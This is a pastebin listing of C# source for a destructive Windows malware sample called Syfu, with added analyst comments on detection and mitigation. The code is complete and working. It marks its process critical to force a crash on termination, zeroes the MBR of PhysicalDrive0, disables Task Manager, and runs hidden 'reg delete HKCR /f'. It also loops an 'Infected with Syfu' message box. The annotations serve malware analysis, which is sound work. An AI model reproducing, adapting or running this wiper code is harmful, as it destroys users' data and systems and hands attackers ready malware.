FlyFar

Syfu.cs

Jun 12th, 2023
C# 3.81 KB | Cybersecurity | 0 0
  1. using System;
  2. using System.Collections.Generic;
  3. using System.Linq;
  4. using System.Text;
  5. using System.Threading.Tasks;
  6. using System.Drawing;
  7. using System.Windows.Forms;
  8. using System.Threading;
  9. using System.IO;
  10. using System.Runtime.InteropServices;
  11. using System.Diagnostics;
  12. using Microsoft.Win32;
  13.  
  14. namespace SyFu
  15. {
          /// <summary>
          /// Analyst annotation of a destructive Windows sample (it calls itself "Syfu" in its
          /// message box text). The visible code does four things:
          ///   1. marks its own process as break-on-termination (information class 0x1D),
          ///   2. writes 512 zero bytes to the start of \\.\PhysicalDrive0,
          ///   3. sets the per-user DisableTaskMgr policy value and starts hidden cmd.exe
          ///      children that run regedit and reg delete,
          ///   4. shows a message box in an endless loop.
          /// Indicators visible in this file: the device path \\.\PhysicalDrive0, the value name
          /// DisableTaskMgr, the path C:\Program Files\Temp\disctrl.reg, the command line
          /// "reg delete HKCR /f" and the string "Infected with Syfu".
          /// Analyse only inside a disposable, isolated VM with snapshots.
          /// </summary>
  16.     public class Class1
  17.     {
              // Native process-information setter; Main calls it with class 0x1D on the current process.
  18.         [DllImport("ntdll.dll", SetLastError = true)]
  19.         private static extern int NtSetInformationProcess(IntPtr hProcess, int processInformationClass, ref int processInformation, int processInformationLength);
  20.  
              // Win32 file open; mbr_destory uses it on a raw disk device path.
              // No CloseHandle import is declared in this class, so the visible code never closes the handle.
  21.         [DllImport("kernel32")]
  22.         private static extern IntPtr CreateFile(
  23.             string lpFileName,
  24.             uint dwDesiredAccess,
  25.             uint dwShareMode,
  26.             IntPtr lpSecurityAttributes,
  27.             uint dwCreationDisposition,
  28.             uint dwFlagsAndAttributes,
  29.             IntPtr hTemplateFile);
  30.  
              // Win32 write; mbr_destory uses it on the handle returned by CreateFile.
  31.         [DllImport("kernel32")]
  32.         private static extern bool WriteFile(
  33.             IntPtr hFile,
  34.             byte[] lpBuffer,
  35.             uint nNumberOfBytesToWrite,
  36.             out uint lpNumberOfBytesWritten,
  37.             IntPtr lpOverlapped);
  38.  
              // Generic access-right values. Only GenericAll is referenced in the visible code;
              // GenericRead, GenericWrite and GenericExecute are declared but unused here.
  39.         private const uint GenericRead = 0x80000000;
  40.         private const uint GenericWrite = 0x40000000;
  41.         private const uint GenericExecute = 0x20000000;
  42.         private const uint GenericAll = 0x10000000;
  43.  
              // Share-mode flags passed to CreateFile in mbr_destory.
  44.         private const uint FileShareRead = 0x1;
  45.         private const uint FileShareWrite = 0x2;
  46.  
              // Creation disposition passed to CreateFile in mbr_destory.
  47.         private const uint OpenExisting = 0x3;
  48.  
              // Declared but not referenced in the visible code.
  49.         private const uint FileFlagDeleteOnClose = 0x4000000;
  50.  
              // Size of the buffer written to the disk: one 512-byte sector.
  51.         private const uint MbrSize = 512u;
  52.  
              /// <summary>
              /// Entry point. Sets the break-on-termination flag on the current process, then runs
              /// the disk write on one thread, the registry changes on the calling thread, and the
              /// message-box loop on a second thread.
              /// </summary>
  53.         public static void Main()
  54.         {
  55.             //BSOD on termination
                  // Process.EnterDebugMode() enables SeDebugPrivilege, which is only available to an
                  // elevated token. The NtSetInformationProcess call passes class 0x1D with value 1
                  // for the current process; its return status is ignored.
                  // Detection: a non-system process enabling SeDebugPrivilege and then setting
                  // break-on-termination on itself is a strong behavioural signal.
                  // Mitigation: running users without administrative rights denies the privilege.
  56.             int isCritical = 1;
  57.             int BreakOnTermination = 0x1D;
  58.             Process.EnterDebugMode();
  59.             NtSetInformationProcess(Process.GetCurrentProcess().Handle, BreakOnTermination, ref isCritical, sizeof(int));
  60.  
                  // Three separate Class1 instances are created although none of the methods
                  // below reads instance state.
  61.             Class1 mbr_nostatic = new Class1();
  62.             Thread mbr = new Thread(mbr_nostatic.mbr_destory);
  63.  
  64.             Class1 reg_dest = new Class1();
  65.  
  66.             Class1 msg_loop_static = new Class1();
  67.             Thread msg_looping = new Thread(msg_loop_static.msg_box);
  68.  
                  // Order of effects: the disk-write thread is started first, the registry changes
                  // run synchronously on this thread, and the message-box thread is started last.
  69.             mbr.Start();
  70.             reg_dest.reg_destory();
  71.             msg_looping.Start();
  72.         }
              /// <summary>
              /// Opens \\.\PhysicalDrive0 and writes a 512-byte buffer to it.
              /// </summary>
              // The buffer comes from new byte[MbrSize] and is never filled, so it holds zeros.
              // Neither the CreateFile handle nor the WriteFile result is checked, and the empty
              // catch hides any managed exception, so a denied open leaves no error output.
              // Detection: alert on user-mode processes opening \\.\PhysicalDrive* with write access.
              // Mitigation: raw disk access needs administrative rights; keep offline backups and
              // recovery media so a zeroed first sector can be restored.
  73.         public void mbr_destory()
  74.         {
  75.             var mbrData = new byte[MbrSize];
  76.             var mbr = CreateFile("\\\\.\\PhysicalDrive0", GenericAll, FileShareRead | FileShareWrite, IntPtr.Zero,
  77.                 OpenExisting, 0, IntPtr.Zero);
  78.  
  79.             try
  80.             {
  81.                 WriteFile(mbr, mbrData, MbrSize, out uint lpNumberofBytesWritten, IntPtr.Zero);
  82.             }
  83.             catch { }
  84.         }
  85.  
              /// <summary>
              /// Sets the DisableTaskMgr policy value for the current user and starts two hidden
              /// cmd.exe processes: one invoking regedit with a .reg file path, one invoking
              /// reg delete against HKCR.
              /// </summary>
  86.         public void reg_destory()
  87.         {
                  // Writes DisableTaskMgr = 1 (DWORD) under
                  // HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System.
                  // Detection: registry auditing on this value; it is rarely set outside managed policy.
  88.             RegistryKey key = Registry.CurrentUser.CreateSubKey(@"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System");
  89.             key.SetValue("DisableTaskMgr", 1, RegistryValueKind.DWord);
  90.             key.Close();
  91.  
                  // First hidden cmd.exe: the command line references C:\Program Files\Temp\disctrl.reg.
                  // Nothing in the visible code creates that file, so it presumably comes from another
                  // component. NOTE(review): confirm against the full sample.
                  // Detection: process-creation logging with command lines enabled shows cmd.exe started
                  // with a hidden window style and a regedit /s argument.
  92.             const string quote = "\"";
  93.             ProcessStartInfo ctrl = new ProcessStartInfo();
  94.             ctrl.FileName = "cmd.exe";
  95.             ctrl.WindowStyle = ProcessWindowStyle.Hidden;
  96.             ctrl.Arguments = @"/k regedit /s" + quote + @"C:\Program Files\Temp\disctrl.reg" + quote + " && exit";
  97.             Process.Start(ctrl);
  98.  
                  // Second hidden cmd.exe: runs "reg delete HKCR /f". Because /k is used without a
                  // trailing exit, this cmd.exe instance stays resident afterwards, which is itself
                  // a forensic artifact.
                  // Detection: reg.exe invoked with "delete" against the HKCR root and the /f switch.
  99.             ProcessStartInfo reg_kill = new ProcessStartInfo();
  100.             reg_kill.FileName = "cmd.exe";
  101.             reg_kill.WindowStyle = ProcessWindowStyle.Hidden;
  102.             reg_kill.Arguments = @"/k reg delete HKCR /f";
  103.             Process.Start(reg_kill);
  104.         }
               /// <summary>
               /// Shows a modal message box with the text "Infected with Syfu" in a loop that never exits.
               /// </summary>
               // The loop has no exit condition, so this thread never returns. The literal string
               // is a convenient static-signature indicator for this sample.
  105.         public void msg_box()
  106.         {
  107.             while (true)
  108.             {
  109.                 MessageBox.Show("Infected with Syfu");
  110.             }
  111.         }
  112.     }
  113. }